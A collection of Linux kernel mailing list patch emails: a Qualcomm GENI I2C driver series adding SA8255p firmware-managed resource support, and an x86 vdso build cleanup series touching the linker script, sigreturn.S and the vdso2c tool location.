|
To avoid repeatedly fetching and checking platform data across various
functions, store the struct of_device_id data directly in the i2c
private structure. This change enhances code maintainability and reduces
redundancy.
Acked-by: Viken Dadhaniya <viken.dadhaniya@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4
- Added Acked-by tag.
Konrad
- Removed icc_ddr from platform data struct
---
drivers/i2c/busses/i2c-qcom-geni.c | 30 ++++++++++++++----------------
1 file changed, 14 insertions(+), 16 deletions(-)
diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
index 4ff84bb0fff5..8fd62d659c2a 100644
--- a/drivers/i2c/busses/i2c-qcom-geni.c
+++ b/drivers/i2c/busses/i2c-qcom-geni.c
@@ -77,6 +77,12 @@ enum geni_i2c_err_code {
#define XFER_TIMEOUT HZ
#define RST_TIMEOUT HZ
+struct geni_i2c_desc {
+ bool has_core_clk;
+ bool no_dma_support;
+ unsigned int tx_fifo_depth;
+};
+
#define QCOM_I2C_MIN_NUM_OF_MSGS_MULTI_DESC 2
/**
@@ -122,13 +128,7 @@ struct geni_i2c_dev {
bool is_tx_multi_desc_xfer;
u32 num_msgs;
struct geni_i2c_gpi_multi_desc_xfer i2c_multi_desc_config;
-};
-
-struct geni_i2c_desc {
- bool has_core_clk;
- char *icc_ddr;
- bool no_dma_support;
- unsigned int tx_fifo_depth;
+ const struct geni_i2c_desc *dev_data;
};
struct geni_i2c_err_log {
@@ -979,7 +979,6 @@ static int setup_gpi_dma(struct geni_i2c_dev *gi2c)
static int geni_i2c_init(struct geni_i2c_dev *gi2c)
{
- const struct geni_i2c_desc *desc = NULL;
u32 proto, tx_depth;
bool fifo_disable;
int ret;
@@ -1002,8 +1001,7 @@ static int geni_i2c_init(struct geni_i2c_dev *gi2c)
goto err;
}
- desc = device_get_match_data(gi2c->se.dev);
- if (desc && desc->no_dma_support) {
+ if (gi2c->dev_data->no_dma_support) {
fifo_disable = false;
gi2c->no_dma = true;
} else {
@@ -1023,8 +1021,8 @@ static int geni_i2c_init(struct geni_i2c_dev *gi2c)
tx_depth = geni_se_get_tx_fifo_depth(&gi2c->se);
/* I2C Master Hub Serial Elements doesn't have the HW_PARAM_0 register */
- if (!tx_depth && desc)
- tx_depth = desc->tx_fifo_depth;
+ if (!tx_depth && gi2c->dev_data->has_core_clk)
+ tx_depth = gi2c->dev_data->tx_fifo_depth;
if (!tx_depth) {
ret = dev_err_probe(gi2c->se.dev, -EINVAL,
@@ -1067,7 +1065,6 @@ static int geni_i2c_probe(struct platform_device *pdev)
struct geni_i2c_dev *gi2c;
int ret;
struct device *dev = &pdev->dev;
- const struct geni_i2c_desc *desc = NULL;
gi2c = devm_kzalloc(dev, sizeof(*gi2c), GFP_KERNEL);
if (!gi2c)
@@ -1079,7 +1076,7 @@ static int geni_i2c_probe(struct platform_device *pdev)
if (IS_ERR(gi2c->se.base))
return PTR_ERR(gi2c->se.base);
- desc = device_get_match_data(&pdev->dev);
+ gi2c->dev_data = device_get_match_data(&pdev->dev);
ret = device_property_read_u32(dev, "clock-frequency",
&gi2c->clk_freq_out);
@@ -1218,15 +1215,16 @@ static const struct dev_pm_ops geni_i2c_pm_ops = {
NULL)
};
+static const struct geni_i2c_desc geni_i2c = {};
+
static const struct geni_i2c_desc i2c_master_hub = {
.has_core_clk = true,
- .icc_ddr = NULL,
.no_dma_support = true,
.tx_fifo_depth = 16,
};
static const struct of_device_id geni_i2c_dt_match[] = {
- { .compatible = "qcom,geni-i2c" },
+ { .compatible = "qcom,geni-i2c", .data = &geni_i2c },
{ .compatible = "qcom,geni-i2c-master-hub", .data = &i2c_master_hub },
{}
};
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:21 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resource operations over SCMI using the power
and performance protocols.
The SCMI power protocol enables or disables resources such as clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power on/off.
The SCMI performance protocol manages the I2C frequency, with each
frequency represented by a performance level. The driver uses the
geni_se_set_perf_opp() API to request the desired frequency.
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Acked-by: Viken Dadhaniya <viken.dadhaniya@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4:
- Added Acked-by tag.
v1->v2:
- Initialized ret to "0" in resume/suspend callbacks.
Bjorn:
- Used separate APIs for the resources enable/disable.
---
drivers/i2c/busses/i2c-qcom-geni.c | 56 ++++++++++++++++++++++--------
1 file changed, 42 insertions(+), 14 deletions(-)
diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
index 8fd62d659c2a..2ad31e412b96 100644
--- a/drivers/i2c/busses/i2c-qcom-geni.c
+++ b/drivers/i2c/busses/i2c-qcom-geni.c
@@ -81,6 +81,10 @@ struct geni_i2c_desc {
bool has_core_clk;
bool no_dma_support;
unsigned int tx_fifo_depth;
+ int (*resources_init)(struct geni_se *se);
+ int (*set_rate)(struct geni_se *se, unsigned long freq);
+ int (*power_on)(struct geni_se *se);
+ int (*power_off)(struct geni_se *se);
};
#define QCOM_I2C_MIN_NUM_OF_MSGS_MULTI_DESC 2
@@ -203,8 +207,9 @@ static int geni_i2c_clk_map_idx(struct geni_i2c_dev *gi2c)
return -EINVAL;
}
-static void qcom_geni_i2c_conf(struct geni_i2c_dev *gi2c)
+static int qcom_geni_i2c_conf(struct geni_se *se, unsigned long freq)
{
+ struct geni_i2c_dev *gi2c = dev_get_drvdata(se->dev);
const struct geni_i2c_clk_fld *itr = gi2c->clk_fld;
u32 val;
@@ -217,6 +222,7 @@ static void qcom_geni_i2c_conf(struct geni_i2c_dev *gi2c)
val |= itr->t_low_cnt << LOW_COUNTER_SHFT;
val |= itr->t_cycle_cnt;
writel_relaxed(val, gi2c->se.base + SE_I2C_SCL_COUNTERS);
+ return 0;
}
static void geni_i2c_err_misc(struct geni_i2c_dev *gi2c)
@@ -908,7 +914,9 @@ static int geni_i2c_xfer(struct i2c_adapter *adap,
return ret;
}
- qcom_geni_i2c_conf(gi2c);
+ ret = gi2c->dev_data->set_rate(&gi2c->se, gi2c->clk_freq_out);
+ if (ret)
+ return ret;
if (gi2c->gpi_mode)
ret = geni_i2c_gpi_xfer(gi2c, msgs, num);
@@ -1043,8 +1051,9 @@ static int geni_i2c_init(struct geni_i2c_dev *gi2c)
return ret;
}
-static int geni_i2c_resources_init(struct geni_i2c_dev *gi2c)
+static int geni_i2c_resources_init(struct geni_se *se)
{
+ struct geni_i2c_dev *gi2c = dev_get_drvdata(se->dev);
int ret;
ret = geni_se_resources_init(&gi2c->se);
@@ -1097,7 +1106,7 @@ static int geni_i2c_probe(struct platform_device *pdev)
spin_lock_init(&gi2c->lock);
platform_set_drvdata(pdev, gi2c);
- ret = geni_i2c_resources_init(gi2c);
+ ret = gi2c->dev_data->resources_init(&gi2c->se);
if (ret)
return ret;
@@ -1156,15 +1165,17 @@ static void geni_i2c_shutdown(struct platform_device *pdev)
static int __maybe_unused geni_i2c_runtime_suspend(struct device *dev)
{
- int ret;
+ int ret = 0;
struct geni_i2c_dev *gi2c = dev_get_drvdata(dev);
disable_irq(gi2c->irq);
- ret = geni_se_resources_deactivate(&gi2c->se);
- if (ret) {
- enable_irq(gi2c->irq);
- return ret;
+ if (gi2c->dev_data->power_off) {
+ ret = gi2c->dev_data->power_off(&gi2c->se);
+ if (ret) {
+ enable_irq(gi2c->irq);
+ return ret;
+ }
}
gi2c->suspended = 1;
@@ -1173,12 +1184,14 @@ static int __maybe_unused geni_i2c_runtime_suspend(struct device *dev)
static int __maybe_unused geni_i2c_runtime_resume(struct device *dev)
{
- int ret;
+ int ret = 0;
struct geni_i2c_dev *gi2c = dev_get_drvdata(dev);
- ret = geni_se_resources_activate(&gi2c->se);
- if (ret)
- return ret;
+ if (gi2c->dev_data->power_on) {
+ ret = gi2c->dev_data->power_on(&gi2c->se);
+ if (ret)
+ return ret;
+ }
enable_irq(gi2c->irq);
gi2c->suspended = 0;
@@ -1215,17 +1228,32 @@ static const struct dev_pm_ops geni_i2c_pm_ops = {
NULL)
};
-static const struct geni_i2c_desc geni_i2c = {};
+static const struct geni_i2c_desc geni_i2c = {
+ .resources_init = geni_i2c_resources_init,
+ .set_rate = qcom_geni_i2c_conf,
+ .power_on = geni_se_resources_activate,
+ .power_off = geni_se_resources_deactivate,
+};
static const struct geni_i2c_desc i2c_master_hub = {
.has_core_clk = true,
.no_dma_support = true,
.tx_fifo_depth = 16,
+ .resources_init = geni_i2c_resources_init,
+ .set_rate = qcom_geni_i2c_conf,
+ .power_on = geni_se_resources_activate,
+ .power_off = geni_se_resources_deactivate,
+};
+
+static const struct geni_i2c_desc sa8255p_geni_i2c = {
+ .resources_init = geni_se_domain_attach,
+ .set_rate = geni_se_set_perf_opp,
};
static const struct of_device_id geni_i2c_dt_match[] = {
{ .compatible = "qcom,geni-i2c", .data = &geni_i2c },
{ .compatible = "qcom,geni-i2c-master-hub", .data = &i2c_master_hub },
+ { .compatible = "qcom,sa8255p-geni-i2c", .data = &sa8255p_geni_i2c },
{}
};
MODULE_DEVICE_TABLE(of, geni_i2c_dt_match);
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:22 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
Currently the vdso doesn't include .note.gnu.property or a GNU noexec
stack annotation (the -z noexecstack in the linker script is
ineffective because we specify PHDRs explicitly).
The motivation is that the dynamic linker currently does not check
these.
However, this is a weak excuse: the vdso*.so are also supposed to be
usable as link libraries, and there is no reason why the dynamic
linker might not want or need to check these in the future, so add
them back in -- it is trivial enough.
Use symbolic constants for the PHDR permission flags.
[ v4: drop unrelated formatting changes ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/common/vdso-layout.lds.S | 38 ++++++++++++--------
1 file changed, 23 insertions(+), 15 deletions(-)
diff --git a/arch/x86/entry/vdso/common/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
index ec1ac191a057..a1e30be3e83d 100644
--- a/arch/x86/entry/vdso/common/vdso-layout.lds.S
+++ b/arch/x86/entry/vdso/common/vdso-layout.lds.S
@@ -47,18 +47,18 @@ SECTIONS
*(.gnu.linkonce.b.*)
} :text
- /*
- * Discard .note.gnu.property sections which are unused and have
- * different alignment requirement from vDSO note sections.
- */
- /DISCARD/ : {
+ .note.gnu.property : {
*(.note.gnu.property)
- }
- .note : { *(.note.*) } :text :note
-
- .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
- .eh_frame : { KEEP (*(.eh_frame)) } :text
+ } :text :note :gnu_property
+ .note : {
+ *(.note*)
+ } :text :note
+ .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
+ .eh_frame : {
+ KEEP (*(.eh_frame))
+ *(.eh_frame.*)
+ } :text
/*
* Text is well-separated from actual data: there's plenty of
@@ -87,15 +87,23 @@ SECTIONS
* Very old versions of ld do not recognize this name token; use the constant.
*/
#define PT_GNU_EH_FRAME 0x6474e550
+#define PT_GNU_STACK 0x6474e551
+#define PT_GNU_PROPERTY 0x6474e553
/*
* We must supply the ELF program headers explicitly to get just one
* PT_LOAD segment, and set the flags explicitly to make segments read-only.
- */
+*/
+#define PF_R FLAGS(4)
+#define PF_RW FLAGS(6)
+#define PF_RX FLAGS(5)
+
PHDRS
{
- text PT_LOAD FLAGS(5) FILEHDR PHDRS; /* PF_R|PF_X */
- dynamic PT_DYNAMIC FLAGS(4); /* PF_R */
- note PT_NOTE FLAGS(4); /* PF_R */
- eh_frame_hdr PT_GNU_EH_FRAME;
+ text PT_LOAD PF_RX FILEHDR PHDRS;
+ dynamic PT_DYNAMIC PF_R;
+ note PT_NOTE PF_R;
+ eh_frame_hdr PT_GNU_EH_FRAME PF_R;
+ gnu_stack PT_GNU_STACK PF_RW;
+ gnu_property PT_GNU_PROPERTY PF_R;
}
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:26:01 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
A macro SYSCALL_ENTER_KERNEL was defined in sigreturn.S, with the
ability to override it. The override capability, however, is not
used anywhere, and the macro name is potentially confusing because it
seems to imply that sysenter/syscall could be used here, which is NOT
true: the sigreturn system calls MUST use int $0x80.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 8 ++------
1 file changed, 2 insertions(+), 6 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 1bd068f72d4c..965900c6763b 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -3,10 +3,6 @@
#include <asm/unistd_32.h>
#include <asm/asm-offsets.h>
-#ifndef SYSCALL_ENTER_KERNEL
-#define SYSCALL_ENTER_KERNEL int $0x80
-#endif
-
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
@@ -16,7 +12,7 @@ __kernel_sigreturn:
.LSTART_sigreturn:
popl %eax /* XXX does this mean it needs unwind info? */
movl $__NR_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
@@ -28,7 +24,7 @@ SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
__kernel_rt_sigreturn:
.LSTART_rt_sigreturn:
movl $__NR_rt_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:25:59 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
It is generally better to build tools in arch/x86/tools to keep host
cflags proliferation down, and to reduce makefile sequencing issues.
Move the vdso build tool vdso2c into arch/x86/tools in preparation for
refactoring the vdso makefiles.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/Makefile | 2 +-
arch/x86/entry/vdso/Makefile | 7 +++----
arch/x86/tools/Makefile | 15 ++++++++++-----
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
5 files changed, 14 insertions(+), 10 deletions(-)
rename arch/x86/{entry/vdso => tools}/vdso2c.c (100%)
rename arch/x86/{entry/vdso => tools}/vdso2c.h (100%)
diff --git a/arch/x86/Makefile b/arch/x86/Makefile
index 1d403a3612ea..9ab7522ced18 100644
--- a/arch/x86/Makefile
+++ b/arch/x86/Makefile
@@ -252,7 +252,7 @@ endif
archscripts: scripts_basic
- $(Q)$(MAKE) $(build)=arch/x86/tools relocs
+ $(Q)$(MAKE) $(build)=arch/x86/tools relocs vdso2c
###
# Syscall table generation
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 7f833026d5b2..3d9b09f00c70 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -38,13 +38,12 @@ VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
$(call if_changed,vdso_and_check)
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi -I$(srctree)/arch/$(SUBARCH)/include/uapi
-hostprogs += vdso2c
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/tools/Makefile b/arch/x86/tools/Makefile
index 7278e2545c35..39a183fffd04 100644
--- a/arch/x86/tools/Makefile
+++ b/arch/x86/tools/Makefile
@@ -38,9 +38,14 @@ $(obj)/insn_decoder_test.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tool
$(obj)/insn_sanity.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tools/arch/x86/lib/inat.c $(srctree)/tools/arch/x86/include/asm/inat_types.h $(srctree)/tools/arch/x86/include/asm/inat.h $(srctree)/tools/arch/x86/include/asm/insn.h $(objtree)/arch/x86/lib/inat-tables.c
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include
-hostprogs += relocs
-relocs-objs := relocs_32.o relocs_64.o relocs_common.o
-PHONY += relocs
-relocs: $(obj)/relocs
+HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi \
+ -I$(srctree)/arch/$(SUBARCH)/include/uapi
+
+hostprogs += relocs vdso2c
+relocs-objs := relocs_32.o relocs_64.o relocs_common.o
+
+always-y := $(hostprogs)
+
+PHONY += $(hostprogs)
+$(hostprogs): %: $(obj)/%
@:
diff --git a/arch/x86/entry/vdso/vdso2c.c b/arch/x86/tools/vdso2c.c
similarity index 100%
rename from arch/x86/entry/vdso/vdso2c.c
rename to arch/x86/tools/vdso2c.c
diff --git a/arch/x86/entry/vdso/vdso2c.h b/arch/x86/tools/vdso2c.h
similarity index 100%
rename from arch/x86/entry/vdso/vdso2c.h
rename to arch/x86/tools/vdso2c.h
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:25:56 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
The vdso32 sigreturn.S contains open-coded DWARF bytecode, which
includes a hack for gdb to not try to step back to a previous call
instruction when backtracing from a signal handler.
Neither of those is necessary anymore: the backtracing issue is
handled by ".cfi_startproc simple" and ".cfi_signal_frame", both of which
have been supported for a very long time now, allowing the
remaining frame to be built using regular .cfi annotations.
Add a few more register offsets to the signal frame just for good
measure.
Replace the nop on fallthrough of the system call (which should never,
ever happen) with a ud2a trap.
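[Editor's note, not part of the patch: the operands in the hand-written table being removed use the DWARF LEB128 variable-length encodings emitted by the .uleb128/.sleb128 assembler directives. A minimal Python decoder, just to illustrate the format the old bytecode was written in:]

```python
def decode_uleb128(data, offset=0):
    """Decode an unsigned LEB128 value; return (value, next_offset)."""
    result = shift = 0
    while True:
        byte = data[offset]
        offset += 1
        result |= (byte & 0x7F) << shift
        shift += 7
        if not (byte & 0x80):
            return result, offset

def decode_sleb128(data, offset=0):
    """Decode a signed LEB128 value; return (value, next_offset)."""
    result = shift = 0
    while True:
        byte = data[offset]
        offset += 1
        result |= (byte & 0x7F) << shift
        shift += 7
        if not (byte & 0x80):
            if byte & 0x40:          # final byte has sign bit set: sign-extend
                result -= 1 << shift
            return result, offset

# The CIE in the removed table uses code alignment 1 and data alignment -4:
assert decode_uleb128(bytes([0x01])) == (1, 1)
assert decode_sleb128(bytes([0x7C])) == (-4, 1)
# Multi-byte case (the classic DWARF example value 624485):
assert decode_uleb128(bytes([0xE5, 0x8E, 0x26])) == (624485, 3)
```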
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 146 ++++++-------------------
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/kernel/asm-offsets.c | 6 +
